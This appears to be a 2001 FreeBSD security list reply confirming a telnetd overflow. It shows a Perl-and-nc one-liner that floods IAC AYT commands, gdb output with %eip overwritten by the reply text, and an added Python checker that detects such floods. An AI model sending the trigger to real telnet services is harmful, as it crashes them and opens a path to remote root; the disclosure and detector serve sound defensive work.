Date:      Thu, 19 Jul 2001 11:03:53 +0200
From:      "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl>
To:        "Mike Tancsa" <mike@sentex.net>
Cc:        <security@freebsd.org>
Subject:   Re: FreeBSD remote root exploit ?
Message-ID:  <014d01c11031$bdab5a10$2001a8c0@clitoris>
References:  <5.1.0.14.0.20010719001357.03e22638@192.168.0.12>

> Posted to bugtraq is a notice about telnetd being remotely root
> exploitable. Does anyone know if it is true ?

Yes, telnetd is vulnerable.

lagoon:venglin:~> perl -e '$c=sprintf("%c%c", 255, 246); sleep 10; print $c
x0 . "\r\n"' | nc localhost 23

(gdb) att 9024
Attaching to process 9024
0x28230f90 in ?? ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x5d736559 in ?? ()
(gdb) bt
#0  0x5d736559 in ?? ()
#1  0x804e9d9 in ?? ()
#2  0x804d1a1 in ?? ()
#3  0x804d6d1 in ?? ()
#4  0x804d14d in ?? ()
#5  0x8049bd3 in ?? ()


The strange %eip value is:

riget:root:/# perl -e 'printf("%c%c%c%c\n", 0x59, 0x65, 0x73, 0x5d)'
Yes]

"\r\n[Yes]\r\n" is the response to the IAC AYT command string.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
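Added example, not from the mail or from FreeBSD's telnetd: a small Python checker written from the monitoring side. It parses a captured telnet input stream with enough of the IAC grammar to count real AYT commands (not bytes inside option negotiation or subnegotiation), sizes the "\r\n[Yes]\r\n" replies telnetd would emit for them, and decodes the faulting %eip back into the "Yes]" text shown in the backtrace. The alert threshold and the sample streams are assumptions.

```python
# Added example (not from the original mail or FreeBSD's telnetd): scan a
# captured telnet input stream for the IAC AYT flood shown above and decode
# the faulting %eip. Sample streams are constructed; the threshold is assumed.
IAC, SE, SB, AYT = 255, 240, 250, 246
WILL, WONT, DO, DONT = 251, 252, 253, 254
AYT_REPLY = b"\r\n[Yes]\r\n"   # telnetd's reply to each AYT, per the mail

def parse_telnet_commands(stream: bytes) -> list:
    """Walk a telnet byte stream and return the command codes it carries.

    Handles IAC IAC (escaped literal 0xff), 3-byte option negotiation
    (IAC WILL/WONT/DO/DONT <opt>) and IAC SB ... IAC SE subnegotiation,
    so that 0xf6 bytes inside those forms are not counted as AYT.
    """
    cmds = []
    i, n = 0, len(stream)
    while i < n:
        if stream[i] != IAC:
            i += 1                      # ordinary data byte
            continue
        if i + 1 >= n:
            break                       # truncated IAC at end of capture
        cmd = stream[i + 1]
        if cmd == IAC:
            i += 2                      # escaped literal 0xff, not a command
        elif cmd in (WILL, WONT, DO, DONT):
            i += 3                      # IAC <verb> <option>
        elif cmd == SB:
            end = stream.find(bytes([IAC, SE]), i + 2)
            i = n if end < 0 else end + 2
            cmds.append(SB)             # whole subnegotiation counts once
        else:
            cmds.append(cmd)            # 2-byte command such as AYT
            i += 2
    return cmds

def ayt_flood_report(stream: bytes, max_ayt: int = 16) -> dict:
    """Count AYT commands and the reply bytes telnetd would queue for them.

    max_ayt is an assumed threshold: an interactive user sends a handful of
    AYTs, not hundreds in one burst.
    """
    ayt = sum(1 for c in parse_telnet_commands(stream) if c == AYT)
    return {"ayt": ayt,
            "reply_bytes": ayt * len(AYT_REPLY),
            "suspicious": ayt > max_ayt}

def eip_as_text(eip: int) -> str:
    """Show a 32-bit little-endian register value as the ASCII that overwrote it."""
    return eip.to_bytes(4, "little").decode("ascii", errors="replace")
```

On the backtrace above, `eip_as_text(0x5d736559)` gives `Yes]`, i.e. the saved return address was overwritten with the tail of the accumulated AYT replies.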

